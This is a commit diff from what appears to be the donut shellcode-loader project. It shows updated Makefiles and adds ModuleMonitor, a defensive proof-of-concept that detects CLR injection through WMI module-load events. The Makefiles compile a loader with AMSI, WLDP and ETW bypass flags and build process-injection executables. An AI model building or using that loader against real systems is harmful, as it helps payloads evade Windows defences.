86 return 0;
87 }
+2
-2
MANIFEST.in less more
22 include LICENSE
33 include version-release-notes.txt
44 recursive-include . *.c
5 recursive-include payload *
5 recursive-include loader *
66 recursive-include include *
77 recursive-include docs *
8 recursive-include lib *
8 recursive-include lib *
+12
-8
Makefile less more
0 donut:
1 gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
2 gcc -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c payload/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o clib.o
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o clib.o
5 debug:
6 gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
0 donut: clean
1 gcc -Wunused-function -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c -odonut lib/aplib64.a
2 gcc -Wunused-function -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c format.c loader/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a
5 debug: clean
6 gcc -Wunused-function -ggdb -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.a -odonut
7 hash:
8 gcc -Wall -Wno-format -fpack-struct=8 -DTEST -I include hash.c loader/clib.c -ohash
9 encrypt:
10 gcc -Wall -Wno-format -fpack-struct=8 -DTEST -I include encrypt.c loader/clib.c -oencrypt
711 clean:
8 rm *.o donut lib/libdonut.a lib/libdonut.so
12 rm -f loader.exe exe2h.exe exe2h loader32.exe loader64.exe donut.o hash.o encrypt.o format.o clib.o hash encrypt donut hash.exe encrypt.exe donut.exe lib/libdonut.a lib/libdonut.so inject32.exe inject64.exe inject_local32.exe inject_local64.exe
+28
-5
Makefile.mingw less more
0 donut:
1 x86_64-w64-mingw32-gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
2 debug:
3 x86_64-w64-mingw32-gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
0 CC32 := i686-w64-mingw32-gcc
1 CC64 := x86_64-w64-mingw32-gcc
2
3 donut: clean
4 $(info ###### RELEASE ######)
5 gcc -I include loader/exe2h/exe2h.c -oexe2h
6 $(CC64) -I include loader/exe2h/exe2h.c loader/exe2h/mmap-windows.c -lshlwapi -oexe2h.exe
7
8 $(CC32) -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib loader/loader.c loader/depack.c loader/clib.c loader/syscalls.c -masm=intel hash.c encrypt.c -I include -oloader.exe
9 ./exe2h loader.exe
10
11 $(CC64) -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib loader/loader.c loader/depack.c loader/clib.c loader/syscalls.c -masm=intel hash.c encrypt.c -I include -oloader.exe
12 ./exe2h loader.exe
13
14 $(CC64) -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.lib -odonut.exe
15
16 $(CC64) -Wall loader/inject.c -oinject32.exe
17 $(CC32) -Wall loader/inject.c -oinject64.exe
18 debug: clean
19 $(info ###### DEBUG ######)
20 $(CC32) -DCLIB -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Wno-format -fpack-struct=8 -DDEBUG -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c loader/syscalls.c -masm=intel -oloader32.exe -lole32 -lshlwapi
21 $(CC64) -DCLIB -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Wno-format -fpack-struct=8 -DDEBUG -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c loader/syscalls.c -masm=intel -oloader64.exe -lole32 -lshlwapi
22 $(CC64) -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c loader/syscalls.c -masm=intel lib/aplib64.lib -odonut.exe
23 $(CC32) -Wall loader/inject_local.c -oinject_local32.exe
24 $(CC64) -Wall loader/inject_local.c -oinject_local64.exe
25 $(CC64) -Wall loader/inject.c -oinject32.exe
26 $(CC32) -Wall loader/inject.c -oinject64.exe
427 clean:
5 rm donut.exe *.o
28 rm -f exe2h exe2h.exe loader.bin instance donut.o hash.o encrypt.o format.o clib.o syscalls.o hash encrypt donut hash.exe encrypt.exe donut.exe lib/libdonut.a lib/libdonut.so loader.exe loader32.exe loader64.exe inject32.exe inject64.exe
+33
-13
Makefile.msvc less more
0 donut:
1 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
2 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
3 move donut.lib lib/donut.lib
4 move donut.exp lib/donut.exp
5 move donut.dll lib/donut.dll
6 debug:
7 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
8 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
9 move donut.lib lib/donut.lib
10 move donut.exp lib/donut.exp
11 move donut.dll lib/donut.dll
0 donut: clean
1 @echo ###### Building exe2h ######
2 ML64 /c loader/syscalls-asm.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64
3
4 cl /nologo loader\exe2h\exe2h.c loader\exe2h\mmap-windows.c
5
6 @echo ###### Building loader ######
7 cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include loader\loader.c hash.c encrypt.c loader\depack.c loader\clib.c loader/syscalls.c
8 link -nologo -order:@loader\order.txt -entry:DonutLoader -fixed -subsystem:console -nodefaultlib loader.obj hash.obj encrypt.obj depack.obj clib.obj syscalls.obj syscalls-asm.obj
9 exe2h loader.exe
10
11 @echo ###### Building generator ######
12 rc include/donut.rc
13 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib include/donut.res
14 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
15 move donut.lib lib\donut.lib
16 move donut.exp lib\donut.exp
17 move donut.dll lib\donut.dll
18 debug: clean
19 ML64 /c loader/syscalls-asm.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64
20 cl /nologo -DDEBUG -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Zp8 -c -nologo -Gy -Os -EHa -GS- -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c loader/syscalls.c
21 link -nologo -order:@loader\order.txt -subsystem:console loader.obj hash.obj encrypt.obj depack.obj clib.obj syscalls.obj syscalls-asm.obj
22
23 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
24 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
25 move donut.lib lib\donut.lib
26 move donut.exp lib\donut.exp
27 move donut.dll lib\donut.dll
28 hash:
29 cl -Zp8 -nologo -DTEST -I include hash.c loader\clib.c
30 encrypt:
31 cl -Zp8 -nologo -DTEST -I include encrypt.c
1232 clean:
13 del *.obj *.bin donut.exe lib/donut.exp lib/donut.lib lib/donut.dll
33 @del /Q mmap-windows.obj donut.obj hash.obj encrypt.obj depack.obj format.obj clib.obj exe2h.obj exe2h.exe loader.obj loader.exe hash.exe encrypt.exe donut.exe lib\libdonut.lib lib\libdonut.dll syscalls.obj syscalls-asm.obj inject32.exe inject64.exe
+29
-0
ModuleMonitor/LICENSE less more
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover
3 All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 1. Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 3. Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+58
-0
ModuleMonitor/ModuleMonitor.csproj less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{361C69F5-7885-4931-949A-B91EEAB170E3}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>ModuleMonitor</RootNamespace>
9 <AssemblyName>ModuleMonitor</AssemblyName>
10 <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <Deterministic>true</Deterministic>
13 <TargetFrameworkProfile />
14 </PropertyGroup>
15 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 <PlatformTarget>AnyCPU</PlatformTarget>
17 <DebugSymbols>true</DebugSymbols>
18 <DebugType>full</DebugType>
19 <Optimize>false</Optimize>
20 <OutputPath>bin\Debug\</OutputPath>
21 <DefineConstants>DEBUG;TRACE</DefineConstants>
22 <ErrorReport>prompt</ErrorReport>
23 <WarningLevel>4</WarningLevel>
24 <Prefer32Bit>false</Prefer32Bit>
25 </PropertyGroup>
26 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 <PlatformTarget>AnyCPU</PlatformTarget>
28 <DebugType>pdbonly</DebugType>
29 <Optimize>true</Optimize>
30 <OutputPath>bin\Release\</OutputPath>
31 <DefineConstants>TRACE</DefineConstants>
32 <ErrorReport>prompt</ErrorReport>
33 <WarningLevel>4</WarningLevel>
34 <Prefer32Bit>false</Prefer32Bit>
35 </PropertyGroup>
36 <PropertyGroup>
37 <ApplicationManifest>app.manifest</ApplicationManifest>
38 </PropertyGroup>
39 <ItemGroup>
40 <Reference Include="System" />
41 <Reference Include="System.Core" />
42 <Reference Include="System.Management" />
43 <Reference Include="System.Xml.Linq" />
44 <Reference Include="System.Data.DataSetExtensions" />
45 <Reference Include="System.Data" />
46 <Reference Include="System.Xml" />
47 </ItemGroup>
48 <ItemGroup>
49 <Compile Include="Program.cs" />
50 <Compile Include="Properties\AssemblyInfo.cs" />
51 </ItemGroup>
52 <ItemGroup>
53 <None Include="app.config" />
54 <None Include="app.manifest" />
55 </ItemGroup>
56 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
57 </Project>
+6
-0
ModuleMonitor/ModuleMonitor.csproj.user less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
3 <StartArguments>--clr-sentry</StartArguments>
4 </PropertyGroup>
5 </Project>
+25
-0
ModuleMonitor/ModuleMonitor.sln less more
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ModuleMonitor", "ModuleMonitor.csproj", "{361C69F5-7885-4931-949A-B91EEAB170E3}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {B18C8887-D713-4379-A365-35C9C89A1C36}
23 EndGlobalSection
24 EndGlobal
+352
-0
ModuleMonitor/Program.cs less more
0 /* Name: ModuleMonitor
1 *
2 *
3 *
4 *
5 *
6 *
7 */
8
9 using System;
10 using System.Linq;
11 using System.Collections.Generic;
12 using System.Diagnostics;
13 using System.Management;
14 using System.Runtime.InteropServices;
15 using System.Security.Principal;
16
17 namespace CLRSentry
18 {
19 class Program
20 {
21 //TODO: Rename projec to ModuleMonitor, and add a --clrssentry option to watch for CLR injection
22 static void Main(string[] args)
23 {
24 if (args.Contains("-h") || args.Contains("--help"))
25 {
26 PrintUsage();
27
28 Environment.Exit(0);
29 }
30
31
32 if (args.Contains("--clr-sentry"))
33 {
34 CLRSentry();
35 }
36 else
37 {
38
39 MonitorModuleLoads();
40
41 }
42 }
43
44 /// <summary>
45 /// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace.
46 /// </summary>
47 public static void MonitorModuleLoads()
48 {
49 //Monitor without any filters
50 MonitorModuleLoads(new List<string>());
51 }
52
53 /// <summary>
54 /// Struct representing the WMI class Win32_ModuleLoadTrace
55 /// </summary>
56 [StructLayout(LayoutKind.Sequential)]
57 public struct Win32_ModuleLoadTrace
58 {
59 public sbyte[] SECURITY_DESCRIPTOR;
60 public UInt64 TIME_CREATED;
61 public string FileName;
62 public UInt64 DefaultBase;
63 public UInt64 ImageBase;
64 public UInt32 ImageChecksum;
65 public UInt64 ImageSize;
66 public UInt32 ProcessID;
67 public UInt32 TimeDateSTamp;
68 }
69
70
71 /// <summary>
72 /// Overload of GetNextModuleLoad that does not require filters.
73 /// </summary>
74 /// <returns></returns>
75 public static Win32_ModuleLoadTrace GetNextModuleLoad()
76 {
77 return GetNextModuleLoad(new List<string>());
78 }
79
80
81 /// <summary>
82 /// Get the details of the next module load
83 /// </summary>
84 /// <param name="filters">Filenames to filter for.</param>
85 /// <returns></returns>
86 public static Win32_ModuleLoadTrace GetNextModuleLoad(List<string> filters)
87 {
88 Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
89
90 //Ideally, we would filter here to reduce the amount of events that we have to consume.
91 //However, we cannot use the WHERE clause because the
92 var startWatch = new ManagementEventWatcher(new WqlEventQuery("SELECT * FROM Win32_ModuleLoadTrace"));
93
94 ManagementBaseObject e = startWatch.WaitForNextEvent();
95
96 //Instead, we filter here, because it's easy and we're a bit lazy
97 if (filters.Count == 0 ^ filters.Contains(((ManagementBaseObject)e)["FileName"].ToString()))
98 {
99 if (((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"] != null)
100 trace.SECURITY_DESCRIPTOR = (sbyte[])((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"];
101
102 if (((ManagementBaseObject)e)["TIME_CREATED"] != null)
103 trace.TIME_CREATED = (UInt64)((ManagementBaseObject)e)["TIME_CREATED"];
104
105 if (((ManagementBaseObject)e)["FileName"] != null)
106 trace.FileName = (string)((ManagementBaseObject)e)["FileName"];
107
108 if (((ManagementBaseObject)e)["DefaultBase"] != null)
109 trace.DefaultBase = (UInt64)((ManagementBaseObject)e)["DefaultBase"];
110
111 if (((ManagementBaseObject)e)["ImageBase"] != null)
112 trace.ImageBase = (UInt64)((ManagementBaseObject)e)["ImageBase"];
113
114 if (((ManagementBaseObject)e)["ImageChecksum"] != null)
115 trace.ImageChecksum = (UInt32)((ManagementBaseObject)e)["ImageChecksum"];
116
117 if (((ManagementBaseObject)e)["ImageSize"] != null)
118 trace.ImageSize = (UInt64)((ManagementBaseObject)e)["ImageSize"];
119
120 if (((ManagementBaseObject)e)["ProcessID"] != null)
121 trace.ProcessID = (UInt32)((ManagementBaseObject)e)["ProcessID"];
122
123 if (((ManagementBaseObject)e)["TimeDateSTamp"] != null)
124 trace.TimeDateSTamp = (UInt32)((ManagementBaseObject)e)["TimeDateSTamp"];
125
126 return trace;
127 }
128 else
129 return trace;
130 }
131
132 public static void CLRSentry()
133 {
134 //Sentries never sleep.
135 //UCMJ Article 113
136 /* Any sentinel or look-out who is found drunk or sleeping upon his post,
137 * or leaves it before he is regularly relieved, shall be punished,
138 * if the offense is committed in time of war, by death or such other punishment as a court-martial may direct,
139 * by if the offense is committed at any other time,
140 * by such punishment other than death as court-martial may direct.
141 */
142 while (true)
143 {
144 //Get the module load.
145 Win32_ModuleLoadTrace trace = GetNextModuleLoad();
146
147 //Split the
148 string[] parts = trace.FileName.Split('\\');
149
150 //Check whether it is a .NET Runtime DLL
151 if (parts[parts.Length - 1].Contains("msco"))
152 {
153 Process proc = Process.GetProcessById((int) trace.ProcessID);
154
155 //Check if the file is a .NET Assembly
156 if (!IsValidAssembly(proc.StartInfo.FileName))
157 {
158 //If it is not, then the CLR has been injected.
159 Console.WriteLine();
160
161 Console.WriteLine("[!] CLR Injection has been detected!");
162
163 //Display information from the event
164 Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
165 Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
166
167 DateTime time = new DateTime();
168 DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
169 time.ToLocalTime();
170
171 //TODO: Time is printing strangley
172 Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
173 //TODO: Convert to hex
174 Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
175 Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
176 Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
177 Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
178 Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
179 Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
180
181 Console.WriteLine("{0,15} Additional Information:", "[>]");
182
183 Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
184
185 if (process != null)
186 {
187
188 Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
189 Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
190 }
191 }
192 }
193 }
194 }
195
196 /// <summary>
197 /// Check if the file is a .NET Assembly by cheating and using the Reflection API's PE Parser.
198 ///
199 /// https://stackoverflow.com/questions/36797939/how-to-test-whether-a-file-is-a-net-assembly-in-c-sharp
200 /// </summary>
201 /// <param name="path">The file to check</param>
202 /// <returns>True if a .NET Assembly, false if not. Hopefully.</returns>
203 public static bool IsValidAssembly(string path)
204 {
205 try
206 {
207 // Attempt to resolve the assembly
208 var assembly = System.Reflection.AssemblyName.GetAssemblyName(path);
209 // Nothing blew up, so it's an assembly
210 return true;
211 }
212 catch (Exception ex)
213 {
214 // Something went wrong, it is not an assembly (specifically a
215 // BadImageFormatException will be thrown if it could be found
216 // but it was NOT a valid assembly
217 return false;
218 }
219 }
220
221
222 /// <summary>
223 /// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace. Optionally filter by module names.
224 /// </summary>
225 /// <param name="filters">A list of module names to filter for.</param>
226 public static void MonitorModuleLoads(List<string> filters)
227 {
228 Console.WriteLine("Monitoring Win32_ModuleLoadTrace...\n");
229
230 while (true)
231 {
232 Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
233 Win32_ModuleLoadTrace tracecomp = new Win32_ModuleLoadTrace();
234
235 //Get the details of the next module load
236 trace = GetNextModuleLoad(filters);
237
238 //If the trace is not empty
239 if (!trace.Equals(tracecomp))
240 {
241 Console.WriteLine();
242
243 //Display information from the event
244 Console.WriteLine("[>] Process {0} has loaded a module:", trace.ProcessID);
245 Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
246
247 DateTime time = new DateTime();
248 DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
249 time.ToLocalTime();
250
251 //TODO: Time is printing strangley
252 Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
253 //TODO: Convert to hex
254 Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
255 Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
256 Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
257 Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
258 Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
259 Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
260
261 Console.WriteLine("{0,15} Additional Information:", "[>]");
262
263 Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
264
265 if (process != null)
266 {
267
268 Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
269 Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
270 }
271 }
272 }
273 }
274
275 [DllImport("advapi32.dll", SetLastError = true)]
276 private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
277 [DllImport("kernel32.dll", SetLastError = true)]
278 [return: MarshalAs(UnmanagedType.Bool)]
279 private static extern bool CloseHandle(IntPtr hObject);
280
281 /// <summary>
282 /// Gets the owner of a process.
283 ///
284 /// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
285 /// </summary>
286 /// <param name="process">The process to inspect.</param>
287 /// <returns>The name of the user, or null if it could not be read.</returns>
288 public static string GetProcessUser(Process process)
289 {
290 IntPtr processHandle = IntPtr.Zero;
291 try
292 {
293 OpenProcessToken(process.Handle, 8, out processHandle);
294 WindowsIdentity wi = new WindowsIdentity(processHandle);
295 return wi.Name;
296 }
297 catch (Exception ex)
298 {
299 return ex.Message;
300 }
301 finally
302 {
303 if (processHandle != IntPtr.Zero)
304 {
305 CloseHandle(processHandle);
306 }
307 }
308 }//end method
309
310
311 /// <summary>
312 /// Try to get the process by ID and return null if it no longer exists.
313 /// </summary>
314 /// <param name="id"></param>
315 /// <returns></returns>
316 private static Process SafeGetProcessByID(int id)
317 {
318 try
319 {
320 return Process.GetProcessById(id);
321
322 }
323 catch
324 {
325 return null;
326 }
327 }
328
329 private static void PrintUsage()
330 {
331 Console.WriteLine();
332 Console.WriteLine("| Module Monitor [v0.1]");
333 Console.WriteLine("| Copyright (c) 2019 TheWover");
334 Console.WriteLine();
335
336 Console.WriteLine("Usage: ModuleMonitor.exe [--clr-sentry]");
337 Console.WriteLine();
338
339 Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
340 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--clr-sentry", "Monitor for CLR injection.");
341 Console.WriteLine();
342
343 Console.WriteLine("Examples:");
344 Console.WriteLine();
345
346 Console.WriteLine("ModuleMonitor.exe");
347 Console.WriteLine("ModuleMonitor.exe --clr-monitor");
348 Console.WriteLine();
349 }
350 }//end class
351 }//end namespace
+36
-0
ModuleMonitor/Properties/AssemblyInfo.cs less more
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("ModuleMonitor")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("ModuleMonitor")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("361c69f5-7885-4931-949a-b91eeab170e3")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
+26
-0
ModuleMonitor/README.md less more
0 # ModuleMonitor
1
2 Has its own repo at: https://github.com/TheWover/ModuleMonitor
3
4 Uses WMI Event Win32_ModuleLoadTrace to monitor module loading. Provides filters, and detailed data. Has an option to monitor for CLR Injection attacks.
5
6 The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
7
8 While useful, there are both false positives and false negatives:
9
10 * False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
11 * False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
12
13 Please Note: This is intended only as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment. You perform the same logic with the ``` Image Load ``` event for Sysmon or ETW. They would be easier to scale and integrate with enterprise tooling.
14
15 ![Alt text](https://github.com/TheWover/donut/blob/master/ModuleMonitor/img/detected.png?raw=true "CLR Sentry detection")
16
17 # Usage
18
19 ```
20 | Module Monitor [v0.1]
21 | Copyright (c) 2019 TheWover
22
23 Usage: ModuleMonitor.exe [--clr-sentry]
24
25 ```
+3
-0
ModuleMonitor/app.config less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/></startup></configuration>
+76
-0
ModuleMonitor/app.manifest less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
2 <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
3 <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
4 <security>
5 <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
6 <!-- UAC Manifest Options
7 If you want to change the Windows User Account Control level replace the
8 requestedExecutionLevel node with one of the following.
9
10 <requestedExecutionLevel level="asInvoker" uiAccess="false" />
11 <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
12 <requestedExecutionLevel level="highestAvailable" uiAccess="false" />
13
14 Specifying requestedExecutionLevel element will disable file and registry virtualization.
15 Remove this element if your application requires this virtualization for backwards
16 compatibility.
17 -->
18 <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
19 </requestedPrivileges>
20 </security>
21 </trustInfo>
22
23 <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
24 <application>
25 <!-- A list of the Windows versions that this application has been tested on
26 and is designed to work with. Uncomment the appropriate elements
27 and Windows will automatically select the most compatible environment. -->
28
29 <!-- Windows Vista -->
30 <!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
31
32 <!-- Windows 7 -->
33 <!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
34
35 <!-- Windows 8 -->
36 <!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
37
38 <!-- Windows 8.1 -->
39 <!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
40
